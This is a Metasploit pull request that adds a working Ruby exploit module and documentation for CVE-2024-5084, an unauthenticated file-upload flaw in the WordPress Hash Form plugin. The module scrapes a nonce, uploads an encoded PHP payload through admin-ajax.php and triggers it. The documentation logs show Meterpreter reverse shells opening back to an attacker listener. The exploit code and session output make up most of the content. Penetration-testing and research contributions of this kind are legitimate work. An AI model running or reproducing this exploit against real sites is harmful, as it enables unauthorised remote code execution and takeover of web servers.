### PR TITLE
Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -61,3 +61,4 @@ woocommerce-payments
 file-manager-advanced-shortcode
 royal-elementor-addons
 backup-backup
+hash-form

--- a/data/wordlists/wp-plugins.txt
+++ b/data/wordlists/wp-plugins.txt
@@ -34566,6 +34566,7 @@ hash-comment-ip
 hash-converter
 hash-coupon
 hash-elements
+hash-form
 hash-hash-tags
 hash-link-scroll-offset
 hashbar-wp-notification-bar

--- a/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
@@ -1,18 +1,18 @@
 ## Vulnerable Application
 
 This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Hash Form
-plugin, versions prior to 1.11.
+plugin, versions prior to 1.1.1.
 The vulnerability is due to an unauthenticated file upload flaw in the plugin.
 To replicate a vulnerable environment for testing:
 
 1. Install WordPress.
-2. Download and install the Hash Form plugin, ensuring the version is below 1.11.
+2. Download and install the Hash Form plugin, ensuring the version is below 1.1.1.
 3. Verify that the plugin is activated and accessible on the local network.
 4. Create any form
 
 ## Verification Steps
 
-1. Set up a WordPress instance with the Hash Form plugin (version < 1.11).
+1. Set up a WordPress instance with the Hash Form plugin (version < 1.1.1).
 2. Launch `msfconsole` in your Metasploit framework.
 3. Use the module: `use exploit/multi/http/wp_hash_form_rce`.
 4. Set `RHOSTS` to the local IP address or hostname of the target.
@@ -22,31 +22,7 @@ To replicate a vulnerable environment for testing:
 
 ## Options
 
-This module offers several options:
-
-#### RHOSTS
-
-- **Description**: Target address or range of addresses.
-- **Required**: Yes.
-- **Default Value**: None (user must specify).
-
-#### RPORT
-
-- **Description**: Target port (TCP) for the WordPress application.
-- **Required**: Yes.
-- **Default Value**: 80.
-
-#### SSL
-
-- **Description**: Determines if SSL/TLS should be used.
-- **Required**: Yes.
-- **Default Value**: False.
-
-#### TARGETURI
-
-- **Description**: Base path of the WordPress application.
-- **Required**: Yes.
-- **Default Value**: `/`.
+No option
 
 ## Scenarios
 
@@ -54,7 +30,7 @@ This module offers several options:
 
 **Setup**:
 
-- Local WordPress instance with Hash Form version 1.10.
+- Local WordPress instance with Hash Form version 1.1.0.
 - Metasploit Framework.
 
 **Steps**:
@@ -64,9 +40,9 @@ This module offers several options:
 ```
 use exploit/multi/http/wp_hash_form_rce
 ```
-4. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
-5. Configure other necessary options (TARGETURI, SSL, etc.).
-6. Launch the exploit:
+3. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
 ```
 exploit
 ```

--- a/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
@@ -34,13 +34,13 @@ This module offers several options:
 
 - **Description**: Target port (TCP) for the WordPress application.
 - **Required**: Yes.
-- **Default Value**: 443.
+- **Default Value**: 80.
 
 #### SSL
 
 - **Description**: Determines if SSL/TLS should be used.
 - **Required**: Yes.
-- **Default Value**: True.
+- **Default Value**: False.
 
 #### TARGETURI
 

--- a/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
@@ -1,0 +1,222 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Hash Form
+plugin, versions prior to 1.11.
+The vulnerability is due to an unauthenticated file upload flaw in the plugin.
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Hash Form plugin, ensuring the version is below 1.11.
+3. Verify that the plugin is activated and accessible on the local network.
+4. Create any form
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Hash Form plugin (version < 1.11).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_hash_form_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+This module offers several options:
+
+#### RHOSTS
+
+- **Description**: Target address or range of addresses.
+- **Required**: Yes.
+- **Default Value**: None (user must specify).
+
+#### RPORT
+
+- **Description**: Target port (TCP) for the WordPress application.
+- **Required**: Yes.
+- **Default Value**: 443.
+
+#### SSL
+
+- **Description**: Determines if SSL/TLS should be used.
+- **Required**: Yes.
+- **Default Value**: True.
+
+#### TARGETURI
+
+- **Description**: Base path of the WordPress application.
+- **Required**: Yes.
+- **Default Value**: `/`.
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Hash Form 1.10
+
+**Setup**:
+
+- Local WordPress instance with Hash Form version 1.10.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_hash_form_rce
+```
+4. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
+5. Configure other necessary options (TARGETURI, SSL, etc.).
+6. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`
+
+```
+msf6 > search wp_hash_form_rce
+
+Matching Modules
+================
+
+   #  Name                                   Disclosure Date  Rank       Check  Description
+   -  ----                                   ---------------  ----       -----  -----------
+   0  exploit/multi/http/wp_hash_form_rce    2024-05-23       excellent  Yes    WordPress Hash Form Plugin RCE
+   1    \_ target: Automatic                 .                .          .      .
+   2    \_ target: PHP In-Memory             .                .          .      .
+   3    \_ target: Unix/Linux Command Shell  .                .          .      .
+   4    \_ target: Windows Command Shell     .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_hash_form_rce
+After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
+
+msf6 > use 0
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/wp_hash_form_rce) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/wp_hash_form_rce) > set target 1
+target => 1
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/zumchnzt.php...
+[*] Sending stage (39927 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:52596) at 2024-05-28 17:52:51 +0200
+
+meterpreter > sysinfo 
+Computer    : 92b664be9b0c
+OS          : Linux 92b664be9b0c 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_hash_form_rce) > options
+
+Module options (exploit/multi/http/wp_hash_form_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      KtElgOyozC       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       5555             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_hash_form_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Detected Hash Form plugin version: 1.1.0
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce from the target...
+[+] Nonce retrieved: c037ee0b47
+[*] Uploading PHP payload using the retrieved nonce...
+[+] PHP payload uploaded successfully to http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php
+[*] Triggering the payload at http://localhost:8080/wp-content/uploads/hashform/temp/roeylnhj.php...
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.20.0.3:53478) at 2024-05-28 18:03:35 +0200
+
+meterpreter > sysinfo
+Computer     : 172.20.0.3
+OS           : Debian 12.5 (Linux 5.15.0-91-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.

--- a/modules/exploits/multi/http/wp_hash_form_rce.rb
+++ b/modules/exploits/multi/http/wp_hash_form_rce.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Hash Form Plugin RCE',
+        'Description' => %q{
+          The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical vulnerability
+          due to missing file type validation in the file_upload_action function. This vulnerability exists
+          in all versions up to and including 1.1.0. Unauthenticated attackers can exploit this flaw to upload arbitrary
+          files, including PHP scripts, to the server, potentially allowing for remote code execution on the affected
+          WordPress site. This module targets multiple platforms by adapting payload delivery and execution based on the
+          server environment.
+        },
+        'Author' => [
+          'Francesco Carlucci', # Vulnerability discovery
+          'Valentin Lobstein'   # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-5084'],
+          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution'],
+        ],
+        'Platform' => ['php', 'unix', 'linux', 'win'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2024-05-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+      )
+  end
+
+  def check
+    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?
+
+    plugin_check_code = check_plugin_version_from_readme('hash-form', '1.1.1')
+    return CheckCode::Unknown('Hash Form plugin does not appear to be installed.') unless plugin_check_code
+    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == 'detected'
+
+    plugin_version = plugin_check_code.details[:version]
+    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == 'appears'
+
+    print_good("Detected Hash Form plugin version: #{plugin_version}")
+    CheckCode::Appears
+  end
+
+  def exploit
+    print_status('Attempting to retrieve nonce from the target...')
+    nonce = get_nonce
+
+    fail_with(Failure::NoTarget, 'Failed to retrieve the nonce necessary for file upload. The target may not be vulnerable or the Hash Form plugin might not be active.') unless nonce
+
+    print_good("Nonce retrieved: #{nonce}")
+    print_status('Uploading PHP payload using the retrieved nonce...')
+
+    file_url = upload_php_file(nonce)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the PHP payload. Check file permissions and server settings.') unless file_url
+
+    print_good("PHP payload uploaded successfully to #{file_url}")
+    trigger_payload(file_url)
+  end
+
+  def get_nonce
+    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'vars_get' => {
+        'action' => 'hashform_preview',
+        'form' => 1
+      }
+    })
+
+    return nil unless res && res.code == 200
+
+    script_content = res.body.match(%r{<script id="frontend-js-extra"[^>]*>([\s\S]*?)</script>})
+    return nil unless script_content && script_content[1]
+
+    nonce_match = script_content[1].match(/"ajax_nounce":"([a-f0-9]+)"/)
+    nonce_match ? nonce_match[1] : nil
+  end
+
+  def upload_php_file(nonce)
+    file_content = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'action' => 'hashform_file_upload_action',
+        'file_uploader_nonce' => nonce,
+        'allowedExtensions[0]' => 'php',
+        'sizeLimit' => 1048576,
+        'qqfile' => file_name
+      },
+      'data' => file_content
+    })
+
+    if res && res.code == 200
+      json_response = res.get_json_document
+      return json_response['url'] if json_response && json_response['url']
+    end
+    nil
+  end
+
+  def trigger_payload(url)
+    print_status("Triggering the payload at #{url}...")
+    uri = URI.parse(url)
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri.path
+    })
+  end
+end

--- a/modules/exploits/multi/http/wp_hash_form_rce.rb
+++ b/modules/exploits/multi/http/wp_hash_form_rce.rb
@@ -6,8 +6,10 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Payload::Php
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
+
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -72,11 +74,15 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?
 
     plugin_check_code = check_plugin_version_from_readme('hash-form', '1.1.1')
-    return CheckCode::Unknown('Hash Form plugin does not appear to be installed.') unless plugin_check_code
-    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == 'detected'
+
+    if plugin_check_code.code == CheckCode::Unknown.code
+      return CheckCode::Unknown('Hash Form plugin does not appear to be installed.')
+    end
+
+    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == CheckCode::Detected.code
 
     plugin_version = plugin_check_code.details[:version]
-    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == 'appears'
+    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == CheckCode::Appears.code
 
     print_good("Detected Hash Form plugin version: #{plugin_version}")
     CheckCode::Appears
@@ -111,15 +117,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return nil unless res && res.code == 200
 
-    script_content = res.body.match(%r{<script id="frontend-js-extra"[^>]*>([\s\S]*?)</script>})
-    return nil unless script_content && script_content[1]
+    script_content = res.get_html_document.xpath('//script[@id="frontend-js-extra"]').text
+    return nil unless script_content
 
-    nonce_match = script_content[1].match(/"ajax_nounce":"([a-f0-9]+)"/)
+    nonce_match = script_content.match(/"ajax_nounce":"([a-f0-9]+)"/)
     nonce_match ? nonce_match[1] : nil
   end
 
+  def php_exec_cmd(encoded_payload)
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+
+    shell = <<-END_OF_PHP_CODE
+      #{php_preamble(disabled_varname: dis)}
+      $c = base64_decode("#{encoded_clean_payload}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+
+    return Rex::Text.compress(shell)
+  end
+
   def upload_php_file(nonce)
-    file_content = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    file_content = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
 
     res = send_request_cgi({
@@ -144,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def trigger_payload(url)
-    print_status("Triggering the payload at #{url}...")
+    print_status('Triggering the payload...')
     uri = URI.parse(url)
     send_request_cgi({
       'method' => 'GET',


### PR DESCRIPTION
Hello Metasploit Team,

I hope this message finds you well.

I am submitting an exploit module for a vulnerability in the WordPress Hash Form – Drag & Drop Form Builder plugin, identified as CVE-2024-5084. This plugin, despite having just over 1000+ installations, presented an interesting challenge that I wanted to tackle.

The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP scripts, due to missing file type validation in the file_upload_action function. This can potentially lead to remote code execution on the affected WordPress site.

Below are the details of my contribution:

- Exploit Module: Targets versions up to and including 1.1.0 of the Hash Form plugin.
- Platforms: Supports PHP, Unix/Linux, and Windows environments.
- References: CVE-2024-5084 and the Wordfence advisory.

You can download the plugin here: https://downloads.wordpress.org/plugin/hash-form.1.1.0.zip